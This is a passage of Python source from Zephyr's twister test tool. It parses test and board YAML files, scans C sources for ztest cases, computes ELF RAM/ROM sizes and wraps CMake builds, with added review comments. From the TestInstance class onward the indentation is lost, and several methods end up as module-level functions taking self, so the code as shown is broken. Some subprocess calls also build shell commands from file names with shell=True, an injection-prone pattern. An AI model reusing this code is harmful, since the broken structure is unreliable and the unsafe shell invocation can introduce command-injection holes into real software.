        """Constructor

        @param filename Path to the output binary; parsed by objdump to
               determine section sizes.
        @param extra_sections Extra section names to treat as recognized.

        Prints a diagnostic and exits the process with status 2 when the
        file is not an ELF binary or carries no symbol information.
        """
        # Make sure this is an ELF binary.
        with open(filename, "rb") as f:
            magic = f.read(4)
        if magic != b'\x7fELF':
            # No valid ELF means there is nothing meaningful to measure.
            # (The original raised an exception only to immediately catch,
            # print, and exit -- report directly instead.)
            print("%s is not an ELF binary" % filename)
            sys.exit(2)

        # Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
        # GREP can not be used as it returns an error if the symbol is not
        # found.
        is_xip_command = "nm " + filename + \
                         " | awk '/CONFIG_XIP/ { print $3 }'"
        is_xip_output = subprocess.check_output(
            is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
            "utf-8").strip()
        if is_xip_output.endswith("no symbols"):
            print("%s has no symbol information" % filename)
            sys.exit(2)
        # Any output at all means the CONFIG_XIP symbol is present.
        self.is_xip = (len(is_xip_output) != 0)
        self.filename = filename
        self.sections = []
        self.rom_size = 0
        self.ram_size = 0
        self.extra_sections = extra_sections
        self._calculate_sizes()

    def get_ram_size(self):
        """Get the amount of RAM the application will use up on the device

        @return amount of RAM, in bytes
        """
        return self.ram_size

    def get_rom_size(self):
        """Get the size of the data that this application uses on device's flash

        @return amount of ROM, in bytes
        """
        return self.rom_size

    def unrecognized_sections(self):
        """Get a list of sections inside the binary that weren't recognized

        @return list of unrecognized section names
        """
        slist = []
        for v in self.sections:
            if not v["recognized"]:
                slist.append(v["name"])
        return slist

    def _calculate_sizes(self):
        """ Calculate RAM and ROM usage by section """
        objdump_command = "objdump -h " + self.filename
        objdump_output = subprocess.check_output(
            objdump_command, shell=True).decode("utf-8").splitlines()
        for line in objdump_output:
            words = line.split()
            if not words:  # Skip lines that are too short
                continue
            index = words[0]
            if not index[0].isdigit():  # Skip lines that do not start
                continue  # with a digit
            name = words[1]  # Skip lines with section names
            if name[0] == '.':  # starting with '.'
                continue
            # TODO this doesn't actually reflect the size in flash or RAM as
            # it doesn't include linker-imposed padding between sections.
            # It is close though.
            size = int(words[2], 16)
            if size == 0:
                continue
            load_addr = int(words[4], 16)
            virt_addr = int(words[3], 16)
            # Add section to memory use totals (for both non-XIP and XIP scenarios)
            # Unrecognized section names are not included in the calculations.
            recognized = True
            if name in SizeCalculator.alloc_sections:
                self.ram_size += size
                stype = "alloc"
            elif name in SizeCalculator.rw_sections:
                self.ram_size += size
                self.rom_size += size
                stype = "rw"
            elif name in SizeCalculator.ro_sections:
                self.rom_size += size
                if not self.is_xip:
                    self.ram_size += size
                stype = "ro"
            else:
                stype = "unknown"
                if name not in self.extra_sections:
                    recognized = False
            self.sections.append({"name": name, "load_addr": load_addr,
                                  "size": size, "virt_addr": virt_addr,
                                  "type": stype, "recognized": recognized})
class TwisterConfigParser:
    """Class to read test case files with semantic checking
    """

    def __init__(self, filename, schema):
        """Instantiate a new TwisterConfigParser object

        @param filename Source .yaml file to read
        @param schema Schema (loaded via scl) used to verify the file
        """
        self.data = {}
        self.schema = schema
        self.filename = filename
        self.tests = {}
        self.common = {}

    def load(self):
        """Load and schema-verify the .yaml file.

        Populates self.tests and self.common from the file's 'tests' and
        'common' sections when present.
        """
        self.data = scl.yaml_load_verify(self.filename, self.schema)
        if 'tests' in self.data:
            self.tests = self.data['tests']
        if 'common' in self.data:
            self.common = self.data['common']

    def _cast_value(self, value, typestr):
        """Convert a raw YAML value to the type named by typestr.

        Supported type strings: "str", "float", "int", "bool", "map",
        "list", "list:<type>", "set" and "set:<type>". The list/set forms
        split string values on whitespace; the ":<type>" variants cast each
        element recursively.

        @raises ConfigurationError if typestr is not one of the above.
        """
        if isinstance(value, str):
            v = value.strip()
        if typestr == "str":
            return v
        elif typestr == "float":
            return float(value)
        elif typestr == "int":
            return int(value)
        elif typestr == "bool":
            # YAML already parses booleans natively; pass through as-is.
            return value
        elif typestr.startswith("list") and isinstance(value, list):
            return value
        elif typestr.startswith("list") and isinstance(value, str):
            vs = v.split()
            if len(typestr) > 4 and typestr[4] == ":":
                return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
            else:
                return vs
        elif typestr.startswith("set"):
            vs = v.split()
            if len(typestr) > 3 and typestr[3] == ":":
                return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
            else:
                return set(vs)
        elif typestr.startswith("map"):
            return value
        else:
            # Bug fix: report the unknown *type string*. The original
            # formatted the value into the message, which made the error
            # useless for diagnosing a bad schema entry.
            raise ConfigurationError(
                self.filename, "unknown type '%s'" % typestr)

    def get_test(self, name, valid_keys):
        """Get a dictionary representing the keys/values within a test

        @param name The test in the .yaml file to retrieve data from
        @param valid_keys A dictionary representing the intended semantics
        for this test. Each key in this dictionary is a key that could
        be specified, if a key is given in the .yaml file which isn't in
        here, it will generate an error. Each value in this dictionary
        is another dictionary containing metadata:

            "default" - Default value if not given
            "type" - Data type to convert the text value to. Simple types
                supported are "str", "float", "int", "bool" which will get
                converted to respective Python data types. "set" and "list"
                may also be specified which will split the value by
                whitespace (but keep the elements as strings). finally,
                "list:<type>" and "set:<type>" may be given which will
                perform a type conversion after splitting the value up.
            "required" - If true, raise an error if not defined. If false
                and "default" isn't specified, a type conversion will be
                done on an empty string

        @return A dictionary containing the test key-value pairs with
            type conversion and default values filled in per valid_keys
        """
        d = {}
        # Start from the 'common' section, then merge in per-test values.
        for k, v in self.common.items():
            d[k] = v
        for k, v in self.tests[name].items():
            if k in d:
                if isinstance(d[k], str):
                    # By default, we just concatenate string values of keys
                    # which appear both in "common" and per-test sections,
                    # but some keys are handled in adhoc way based on their
                    # semantics.
                    if k == "filter":
                        # Filters must both hold, so AND them together.
                        d[k] = "(%s) and (%s)" % (d[k], v)
                    else:
                        d[k] += " " + v
            else:
                d[k] = v
        # Validate against valid_keys: fill defaults, enforce "required",
        # and cast every present value to its declared type.
        for k, kinfo in valid_keys.items():
            if k not in d:
                if "required" in kinfo:
                    required = kinfo["required"]
                else:
                    required = False
                if required:
                    raise ConfigurationError(
                        self.filename,
                        "missing required value for '%s' in test '%s'" %
                        (k, name))
                else:
                    if "default" in kinfo:
                        default = kinfo["default"]
                    else:
                        # No default given: cast an empty string instead.
                        default = self._cast_value("", kinfo["type"])
                    d[k] = default
            else:
                try:
                    d[k] = self._cast_value(d[k], kinfo["type"])
                except ValueError:
                    raise ConfigurationError(
                        self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
                        (kinfo["type"], d[k], k, name))
        return d
class Platform:
    """Class representing metadata for a particular platform
    Maps directly to BOARD when building"""
    platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
                                                 "scripts", "schemas", "twister", "platform-schema.yaml"))
    def __init__(self):
        """Initialize every field to its documented default value."""
        self.name = ""
        self.twister = True
        self.arch = ""
        self.type = "na"
        self.simulation = "na"
        # if no RAM size is specified by the board, take a default of 128K
        self.ram = 128
        # if no flash size is specified by the board, take a default of 512K
        self.flash = 512
        # Testing-related knobs from the board's "testing" section.
        self.timeout_multiplier = 1.0
        self.ignore_tags = []
        self.only_tags = []
        self.default = False
        self.supported = set()
        self.supported_toolchains = []
        # Environment variables the platform needs, and whether all of
        # them are currently set.
        self.env = []
        self.env_satisfied = True
        self.filter_data = dict()
    def load(self, platform_file):
        """Populate this Platform from a board .yaml description file."""
        parser = TwisterConfigParser(platform_file, self.platform_schema)
        parser.load()
        data = parser.data
        self.name = data['identifier']
        self.twister = data.get("twister", True)
        # if no RAM size is specified by the board, take a default of 128K
        self.ram = data.get("ram", 128)
        testing = data.get("testing", {})
        self.timeout_multiplier = testing.get("timeout_multiplier", 1.0)
        self.ignore_tags = testing.get("ignore_tags", [])
        self.only_tags = testing.get("only_tags", [])
        self.default = testing.get("default", False)
        # if no flash size is specified by the board, take a default of 512K
        self.flash = data.get("flash", 512)
        # "supported" entries may be colon-separated composites; flatten
        # them into a single set of feature names.
        self.supported = {feature
                          for entry in data.get("supported", [])
                          for feature in entry.split(":")}
        self.arch = data['arch']
        self.type = data.get('type', "na")
        self.simulation = data.get('simulation', "na")
        self.supported_toolchains = data.get("toolchain", [])
        self.env = data.get("env", [])
        # Satisfied only when every required variable is set to a
        # non-empty value in the current environment.
        self.env_satisfied = all(os.environ.get(var, None) for var in self.env)
    def __repr__(self):
        return f"<{self.name} on {self.arch}>"
class DisablePyTestCollectionMixin(object):
    # Mixin for classes whose names start with "Test": setting
    # __test__ = False tells pytest not to collect them as test classes.
    __test__ = False
class ScanPathResult:
    """Result of the TestSuite.scan_path function call.
    Attributes:
        matches                          A list of test cases
        warnings                         A string containing one or more
                                         warnings to display
        has_registered_test_suites       Whether or not the path contained any
                                         calls to the ztest_register_test_suite
                                         macro.
        has_run_registered_test_suites   Whether or not the path contained at
                                         least one call to
                                         ztest_run_registered_test_suites.
        has_test_main                    Whether or not the path contains a
                                         definition of test_main(void)
        ztest_suite_names                Names of found ztest suites
    """
    def __init__(self,
                 matches: List[str] = None,
                 warnings: str = None,
                 has_registered_test_suites: bool = False,
                 has_run_registered_test_suites: bool = False,
                 has_test_main: bool = False,
                 ztest_suite_names: List[str] = None):
        self.matches = matches
        self.warnings = warnings
        self.has_registered_test_suites = has_registered_test_suites
        self.has_run_registered_test_suites = has_run_registered_test_suites
        self.has_test_main = has_test_main
        # Bug fix: the original used a mutable default argument ([]),
        # which is created once and shared across every call, so one
        # instance's mutations leaked into all later instances. Use a
        # None sentinel and allocate a fresh list per instance instead.
        self.ztest_suite_names = ztest_suite_names if ztest_suite_names is not None else []
    def __eq__(self, other):
        # NOTE: assumes both operands have sortable, non-None 'matches';
        # comparing results whose matches is None raises TypeError
        # (unchanged from the original behavior).
        if not isinstance(other, ScanPathResult):
            return False
        return (sorted(self.matches) == sorted(other.matches) and
                self.warnings == other.warnings and
                (self.has_registered_test_suites ==
                 other.has_registered_test_suites) and
                (self.has_run_registered_test_suites ==
                 other.has_run_registered_test_suites) and
                self.has_test_main == other.has_test_main and
                (sorted(self.ztest_suite_names) ==
                 sorted(other.ztest_suite_names)))
class TestCase(DisablePyTestCollectionMixin):
    """A single named test case and its execution outcome.

    Instances start with no status/reason; handlers and harnesses fill
    these in as results come back.
    """
    def __init__(self, name=None, testsuite=None):
        self.name = name
        self.testsuite = testsuite
        # Outcome fields, populated after execution.
        self.status = None
        self.reason = None
        self.duration = 0
        self.output = ""
    def __lt__(self, other):
        # Cases order alphabetically by name.
        return self.name < other.name
    def __repr__(self):
        return f"<TestCase {self.name} with {self.status}>"
    def __str__(self):
        return self.name
class TestSuite(DisablePyTestCollectionMixin):
    """Class representing a test application
    """
    def __init__(self, testsuite_root, workdir, name):
        """TestSuite constructor.
        This gets called by TestPlan as it finds and reads test yaml files.
        Multiple TestSuite instances may be generated from a single testcase.yaml,
        each one corresponds to an entry within that file.
        We need to have a unique name for every single test case. Since
        a testcase.yaml can define multiple tests, the canonical name for
        the test case is <workdir>/<name>.
        @param testsuite_root os.path.abspath() of one of the --testcase-root
        @param workdir Sub-directory of testsuite_root where the
        .yaml test configuration file was found
        @param name Name of this test case, corresponding to the entry name
        in the test case configuration file. For many test cases that just
        define one test, can be anything and is usually "test". This is
        really only used to distinguish between different cases when
        the testcase.yaml defines multiple tests
        """
        self.source_dir = ""
        self.yamlfile = ""
        self.testcases = []
        self.name = self.get_unique(testsuite_root, workdir, name)
        self.id = name
        # Selection / filtering attributes, typically filled in later
        # from the testcase.yaml entry.
        self.type = None
        self.tags = set()
        self.extra_args = None
        self.extra_configs = None
        self.arch_allow = None
        self.arch_exclude = None
        self.skip = False
        self.platform_exclude = None
        self.platform_allow = None
        self.platform_type = []
        self.toolchain_exclude = None
        self.toolchain_allow = None
        self.ts_filter = None
        self.timeout = 60
        self.harness = ""
        self.harness_config = {}
        self.build_only = True
        self.build_on_all = False
        self.slow = False
        self.min_ram = -1
        self.depends_on = None
        self.min_flash = -1
        self.extra_sections = None
        self.integration_platforms = []
        self.ztest_suite_names = []
    def add_testcase(self, name):
        """Create a TestCase bound to this suite and record it."""
        tc = TestCase(name=name, testsuite=self)
        self.testcases.append(tc)
    @staticmethod
    def get_unique(testsuite_root, workdir, name):
        """Build the canonical unique name for a test case.
        Raises TwisterException when the entry name has no '.' separator
        (names must be of the form <category>.<subsystem>...).
        """
        canonical_testsuite_root = os.path.realpath(testsuite_root)
        if Path(canonical_zephyr_base) in Path(canonical_testsuite_root).parents:
            # This is in ZEPHYR_BASE, so include path in name for uniqueness
            # FIXME: We should not depend on path of test for unique names.
            relative_tc_root = os.path.relpath(canonical_testsuite_root,
                                               start=canonical_zephyr_base)
        else:
            relative_tc_root = ""
        # workdir can be "."
        unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
        check = name.split(".")
        if len(check) < 2:
            raise TwisterException(f"""bad test name '{name}' in {testsuite_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
                    )
        return unique
    def scan_file(self, inf_name):
        """Scan one source file for ztest suite/testcase definitions.
        Handles three styles: legacy ztest_test_suite(), registered
        ztest_register_test_suite(), and the newer ZTEST_SUITE macros.
        @param inf_name Path of the file to scan
        @return ScanPathResult describing what was found
        """
        regular_suite_regex = re.compile(
            # do not match until end-of-line, otherwise we won't allow
            # stc_regex below to catch the ones that are declared in the same
            # line--as we only search starting the end of this match
            br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
            re.MULTILINE)
        registered_suite_regex = re.compile(
            br"^\s*ztest_register_test_suite"
            br"\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
            re.MULTILINE)
        new_suite_regex = re.compile(
            br"^\s*ZTEST_SUITE\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
            re.MULTILINE)
        # Checks if the file contains a definition of "void test_main(void)"
        # Since ztest provides a plain test_main implementation it is OK to:
        # 1. register test suites and not call the run function iff the test
        # doesn't have a custom test_main.
        # 2. register test suites and a custom test_main definition iff the test
        # also calls ztest_run_registered_test_suites.
        test_main_regex = re.compile(
            br"^\s*void\s+test_main\(void\)",
            re.MULTILINE)
        registered_suite_run_regex = re.compile(
            br"^\s*ztest_run_registered_test_suites\("
            br"(\*+|&)?(?P<state_identifier>[a-zA-Z0-9_]+)\)",
            re.MULTILINE)
        warnings = None
        has_registered_test_suites = False
        has_run_registered_test_suites = False
        has_test_main = False
        with open(inf_name) as inf:
            # mmap flags differ between Windows and POSIX platforms.
            if os.name == 'nt':
                mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
            else:
                mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
                             'offset': 0}
            with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
                regular_suite_regex_matches = \
                    [m for m in regular_suite_regex.finditer(main_c)]
                registered_suite_regex_matches = \
                    [m for m in registered_suite_regex.finditer(main_c)]
                new_suite_regex_matches = \
                    [m for m in new_suite_regex.finditer(main_c)]
                if registered_suite_regex_matches:
                    has_registered_test_suites = True
                if registered_suite_run_regex.search(main_c):
                    has_run_registered_test_suites = True
                if test_main_regex.search(main_c):
                    has_test_main = True
                # The three suite styles are mutually exclusive per file:
                # prefer legacy, then registered, then new-style macros.
                if regular_suite_regex_matches:
                    ztest_suite_names = \
                        self._extract_ztest_suite_names(regular_suite_regex_matches)
                    testcase_names, warnings = \
                        self._find_regular_ztest_testcases(main_c, regular_suite_regex_matches, has_registered_test_suites)
                elif registered_suite_regex_matches:
                    ztest_suite_names = \
                        self._extract_ztest_suite_names(registered_suite_regex_matches)
                    testcase_names, warnings = \
                        self._find_regular_ztest_testcases(main_c, registered_suite_regex_matches, has_registered_test_suites)
                elif new_suite_regex_matches:
                    ztest_suite_names = \
                        self._extract_ztest_suite_names(new_suite_regex_matches)
                    testcase_names, warnings = \
                        self._find_new_ztest_testcases(main_c)
                else:
                    # can't find ztest_test_suite, maybe a client, because
                    # it includes ztest.h
                    ztest_suite_names = []
                    testcase_names, warnings = None, None
                return ScanPathResult(
                    matches=testcase_names,
                    warnings=warnings,
                    has_registered_test_suites=has_registered_test_suites,
                    has_run_registered_test_suites=has_run_registered_test_suites,
                    has_test_main=has_test_main,
                    ztest_suite_names=ztest_suite_names)
    @staticmethod
    def _extract_ztest_suite_names(suite_regex_matches):
        """Decode the 'suite_name' groups of the given regex matches."""
        ztest_suite_names = \
            [m.group("suite_name") for m in suite_regex_matches]
        ztest_suite_names = \
            [name.decode("UTF-8") for name in ztest_suite_names]
        return ztest_suite_names
    def _find_regular_ztest_testcases(self, search_area, suite_regex_matches, is_registered_test_suite):
        """
        Find regular ztest testcases like "ztest_unit_test" or similar. Return
        testcases' names and eventually found warnings.
        """
        testcase_regex = re.compile(
            br"""^\s* # empty space at the beginning is ok
            # catch the case where it is declared in the same sentence, e.g:
            #
            # ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
            # ztest_register_test_suite(n, p, ztest_user_unit_test(TESTNAME),
            (?:ztest_
            (?:test_suite\(|register_test_suite\([a-zA-Z0-9_]+\s*,\s*)
            [a-zA-Z0-9_]+\s*,\s*
            )?
            # Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
            ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?
            # Consume the argument that becomes the extra testcase
            \(\s*(?P<testcase_name>[a-zA-Z0-9_]+)
            # _setup_teardown() variant has two extra arguments that we ignore
            (?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?
            \s*\)""",
            # We don't check how it finishes; we don't care
            re.MULTILINE | re.VERBOSE)
        # Preprocessor conditionals inside a suite body make the static
        # scan unreliable, so flag them.
        achtung_regex = re.compile(
            br"(#ifdef|#endif)",
            re.MULTILINE)
        search_start, search_end = \
            self._get_search_area_boundary(search_area, suite_regex_matches, is_registered_test_suite)
        limited_search_area = search_area[search_start:search_end]
        testcase_names, warnings = \
            self._find_ztest_testcases(limited_search_area, testcase_regex)
        achtung_matches = re.findall(achtung_regex, limited_search_area)
        if achtung_matches and warnings is None:
            achtung = ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
            warnings = f"found invalid {achtung} in ztest_test_suite()"
        return testcase_names, warnings
    @staticmethod
    def _get_search_area_boundary(search_area, suite_regex_matches, is_registered_test_suite):
        """
        Get search area boundary based on "ztest_test_suite(...)",
        "ztest_register_test_suite(...)" or "ztest_run_test_suite(...)"
        functions occurrence.
        """
        suite_run_regex = re.compile(
            br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
            re.MULTILINE)
        search_start = suite_regex_matches[0].end()
        suite_run_match = suite_run_regex.search(search_area)
        if suite_run_match:
            search_end = suite_run_match.start()
        elif not suite_run_match and not is_registered_test_suite:
            raise ValueError("can't find ztest_run_test_suite")
        else:
            # Registered suites have no run call here: stop at the first
            # ");" after the suite declaration instead.
            search_end = re.compile(br"\);", re.MULTILINE) \
                .search(search_area, search_start) \
                .end()
        return search_start, search_end
    def _find_new_ztest_testcases(self, search_area):
        """
        Find regular ztest testcases like "ZTEST" or "ZTEST_F". Return
        testcases' names and eventually found warnings.
        """
        testcase_regex = re.compile(
            br"^\s*(?:ZTEST|ZTEST_F)\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,"
            br"\s*(?P<testcase_name>[a-zA-Z0-9_]+)\s*",
            re.MULTILINE)
        return self._find_ztest_testcases(search_area, testcase_regex)
    @staticmethod
    def _find_ztest_testcases(search_area, testcase_regex):
        """
        Parse search area and try to find testcases defined in testcase_regex
        argument. Return testcase names and eventually found warnings.
        """
        testcase_regex_matches = \
            [m for m in testcase_regex.finditer(search_area)]
        testcase_names = \
            [m.group("testcase_name") for m in testcase_regex_matches]
        testcase_names = [name.decode("UTF-8") for name in testcase_names]
        warnings = None
        for testcase_name in testcase_names:
            if not testcase_name.startswith("test_"):
                warnings = "Found a test that does not start with test_"
        # Strip the conventional "test_" prefix from reported names.
        testcase_names = \
            [tc_name.replace("test_", "", 1) for tc_name in testcase_names]
        return testcase_names, warnings
    def scan_path(self, path):
        """Scan a test directory for ztest subcases and suite names.
        Files under src/ are scanned strictly (warnings raise
        TwisterRuntimeError); *.c files directly in the path are scanned
        leniently (warnings only logged).
        @param path Test directory to scan
        @return (subcases, ztest_suite_names) tuple
        """
        subcases = []
        has_registered_test_suites = False
        has_run_registered_test_suites = False
        has_test_main = False
        ztest_suite_names = []
        src_dir_path = self._find_src_dir_path(path)
        for filename in glob.glob(os.path.join(src_dir_path, "*.c*")):
            try:
                result: ScanPathResult = self.scan_file(filename)
                if result.warnings:
                    logger.error("%s: %s" % (filename, result.warnings))
                    raise TwisterRuntimeError(
                        "%s: %s" % (filename, result.warnings))
                if result.matches:
                    subcases += result.matches
                if result.has_registered_test_suites:
                    has_registered_test_suites = True
                if result.has_run_registered_test_suites:
                    has_run_registered_test_suites = True
                if result.has_test_main:
                    has_test_main = True
                if result.ztest_suite_names:
                    ztest_suite_names += result.ztest_suite_names
            except ValueError as e:
                logger.error("%s: can't find: %s" % (filename, e))
        for filename in glob.glob(os.path.join(path, "*.c")):
            try:
                result: ScanPathResult = self.scan_file(filename)
                if result.warnings:
                    logger.error("%s: %s" % (filename, result.warnings))
                if result.matches:
                    subcases += result.matches
                if result.ztest_suite_names:
                    ztest_suite_names += result.ztest_suite_names
            except ValueError as e:
                logger.error("%s: can't find: %s" % (filename, e))
        # Registered suites with a custom test_main must also run them.
        if (has_registered_test_suites and has_test_main and
                not has_run_registered_test_suites):
            warning = \
                "Found call to 'ztest_register_test_suite()' but no "\
                "call to 'ztest_run_registered_test_suites()'"
            logger.error(warning)
            raise TwisterRuntimeError(warning)
        return subcases, ztest_suite_names
    def parse_subcases(self, test_path):
        """Populate self.testcases from the sources found under test_path."""
        subcases, ztest_suite_names = self.scan_path(test_path)
        # if testcases are provided as part of the yaml, skip this step.
        if not self.testcases:
            # only add each testcase once
            for sub in set(subcases):
                name = "{}.{}".format(self.id, sub)
                self.add_testcase(name)
            if not subcases:
                # No subcases found: fall back to a single case named
                # after the suite id itself.
                self.add_testcase(self.id)
        self.ztest_suite_names = ztest_suite_names
    @staticmethod
    def _find_src_dir_path(test_dir_path):
        """
        Try to find src directory with test source code. Sometimes due to the
        optimization reasons it is placed in upper directory.
        """
        src_dir_name = "src"
        src_dir_path = os.path.join(test_dir_path, src_dir_name)
        if os.path.isdir(src_dir_path):
            return src_dir_path
        src_dir_path = os.path.join(test_dir_path, "..", src_dir_name)
        if os.path.isdir(src_dir_path):
            return src_dir_path
        return ""
    def __str__(self):
        return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestSuite on a platform
@param test The TestSuite object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testsuite, platform, outdir):
self.testsuite = testsuite
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.execution_time = 0
self.name = os.path.join(platform.name, testsuite.name)
self.run_id = self._get_run_id()
self.build_dir = os.path.join(outdir, platform.name, testsuite.name)
self.run = False
self.testcases = []
self.init_cases()
# Fix an issue with copying objects from testsuite, need better solution.
def init_cases(self):
for c in self.testsuite.testcases:
self.add_testcase(c.name)
def _get_run_id(self):
""" generate run id from instance unique identifier and a random
number"""
hash_object = hashlib.md5(self.name.encode())
random_str = f"{random.getrandbits(64)}".encode()
hash_object.update(random_str)
return hash_object.hexdigest()
def add_missing_testscases(self, status, reason=None):
for case in self.testcases:
if not case.status:
case.status = status
if reason:
case.reason = reason
else:
case.reason = self.reason
def __getstate__(self):
d = self.__dict__.copy()
return d
def __setstate__(self, d):
self.__dict__.update(d)
def __lt__(self, other):
return self.name < other.name
def set_case_status_by_name(self, name, status, reason=None):
tc = self.get_case_or_create(name)
tc.status = status
if reason:
tc.reason = reason
return tc
def add_testcase(self, name):
tc = TestCase(name=name)
self.testcases.append(tc)
return tc
def get_case_by_name(self, name):
for c in self.testcases:
if c.name == name:
return c
return None
def get_case_or_create(self, name):
for c in self.testcases:
if c.name == name:
return c
logger.debug(f"Could not find a matching testcase for {name}")
tc = TestCase(name=name)
self.testcases.append(tc)
return tc
@staticmethod
def testsuite_runnable(testsuite, fixtures):
can_run = False
# console harness allows us to run the test and capture data.
if testsuite.harness in [ 'console', 'ztest', 'pytest']:
can_run = True
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = testsuite.harness_config.get('fixture')
if fixture:
can_run = (fixture in fixtures)
elif testsuite.harness:
can_run = False
else:
can_run = True
return can_run
# Global testsuite parameters
def check_runnable(self, enable_slow=False, filter='buildable', fixtures=None):
    """Decide whether this instance can actually be executed (vs built only).

    @param enable_slow Allow tests marked "slow" to run.
    @param filter 'runnable' forces the target-ready check to pass.
           (Parameter name shadows the builtin but is kept for backward
           compatibility with keyword callers.)
    @param fixtures Fixtures supplied on the command line (list of str).
    @return True when the test can be run on this platform.
    """
    # Avoid a mutable default argument; None stands in for "no fixtures".
    if fixtures is None:
        fixtures = []
    # right now we only support building on windows. running is still work
    # in progress.
    if os.name == 'nt':
        return False
    # we asked for build-only on the command line
    if self.testsuite.build_only:
        return False
    # Do not run slow tests unless explicitly enabled.
    if self.testsuite.slow and not enable_slow:
        return False
    target_ready = bool(self.testsuite.type == "unit" or \
                    self.platform.type == "native" or \
                    self.platform.simulation in ["mdb-nsim", "nsim", "renode", "qemu", "tsim", "armfvp", "xt-sim"] or \
                    filter == 'runnable')
    # Some simulators additionally require their host tool on PATH; one
    # table lookup replaces four copy-pasted checks.
    sim_executables = {
        "nsim": "nsimdrv",
        "mdb-nsim": "mdb",
        "renode": "renode",
        "tsim": "tsim-leon3",
    }
    required_exe = sim_executables.get(self.platform.simulation)
    if required_exe and not find_executable(required_exe):
        target_ready = False
    testsuite_runnable = self.testsuite_runnable(self.testsuite, fixtures)
    return testsuite_runnable and target_ready
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=None):
    """Write the extra Kconfig overlay fragment for this instance.

    Combines the suite's extra_configs with coverage/ASAN/UBSAN options and,
    when non-empty, writes it to <build_dir>/twister/testsuite_extra.conf.

    @param platform Platform object the overlay is generated for.
    @param coverage_platform Platforms for which coverage was requested.
    @return The overlay content string (may be empty).
    """
    # Avoid a mutable default argument; None stands in for "no platforms".
    if coverage_platform is None:
        coverage_platform = []
    # Create this in a "twister/" subdirectory otherwise this
    # will pass this overlay to kconfig.py *twice* and kconfig.cmake
    # will silently give that second time precedence over any
    # --extra-args=CONFIG_*
    subdir = os.path.join(self.build_dir, "twister")
    parts = []
    if self.testsuite.extra_configs:
        parts.append("\n".join(self.testsuite.extra_configs))
    if enable_coverage and platform.name in coverage_platform:
        parts.append("\nCONFIG_COVERAGE=y")
        parts.append("\nCONFIG_COVERAGE_DUMP=y")
    # Sanitizers only make sense on native (host-executable) platforms.
    if enable_asan and platform.type == "native":
        parts.append("\nCONFIG_ASAN=y")
    if enable_ubsan and platform.type == "native":
        parts.append("\nCONFIG_UBSAN=y")
    content = "".join(parts)
    if content:
        os.makedirs(subdir, exist_ok=True)
        file = os.path.join(subdir, "testsuite_extra.conf")
        with open(file, "w") as f:
            f.write(content)
    return content
def calculate_sizes(self):
    """Get the RAM/ROM sizes of a test case.

    This can only be run after the instance has been executed by
    MakeGenerator, otherwise there won't be any binaries to measure.

    @return A SizeCalculator object
    """
    zephyr_dir = os.path.join(self.build_dir, "zephyr")
    # Collect .elf first, then .exe, dropping pre-link intermediates.
    binaries = [
        path
        for pattern in ("*.elf", "*.exe")
        for path in glob.glob(os.path.join(zephyr_dir, pattern))
        if '_pre' not in path
    ]
    if len(binaries) != 1:
        raise BuildError("Missing/multiple output ELF binary")
    return SizeCalculator(binaries[0], self.testsuite.extra_sections)
def __repr__(self):
    """Human-readable identification for logs and debugging."""
    return f"<TestSuite {self.testsuite.name} on {self.platform.name}>"
class CMake():
    """Wrapper around the ``cmake`` configure and build invocations for one
    test instance.

    NOTE(review): run_cmake()/run_build() read self.warnings_as_errors and
    self.overflow_as_errors, which are not initialized here -- they are set
    by the ProjectBuilder subclass.  Confirm before using CMake directly.
    """

    # Matches "CONFIG_X=value" lines in a generated .config file.
    config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
    # Matches generic "KEY=value" lines (devicetree defines).
    dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')

    def __init__(self, testsuite, platform, source_dir, build_dir):
        self.cwd = None                 # working directory for subprocess calls
        self.capture_output = True      # capture stdout/stderr into the log file
        self.defconfig = {}             # parsed .config (filled by parse_generated)
        self.cmake_cache = {}           # parsed CMakeCache.txt contents
        self.instance = None            # TestInstance being built; set by caller
        self.testsuite = testsuite
        self.platform = platform
        self.source_dir = source_dir
        self.build_dir = build_dir
        self.log = "build.log"
        self.generator = None           # cmake generator name; set by caller
        self.generator_cmd = None
        self.default_encoding = sys.getdefaultencoding()

    def parse_generated(self):
        # Base implementation parses nothing; FilterBuilder overrides this.
        self.defconfig = {}
        return {}

    def run_build(self, args=[]):
        """Invoke ``cmake`` for the build step and record the outcome on
        self.instance.

        @param args Extra cmake arguments (e.g. ['--build', build_dir]).
        @return Result dict with returncode/instance (and msg on success),
                or None when the build succeeded with no output.
                NOTE(review): callers treat None as a build failure -- confirm
                this early-return is intended.
        """
        logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
        cmake_args = []
        cmake_args.extend(args)
        cmake = shutil.which('cmake')
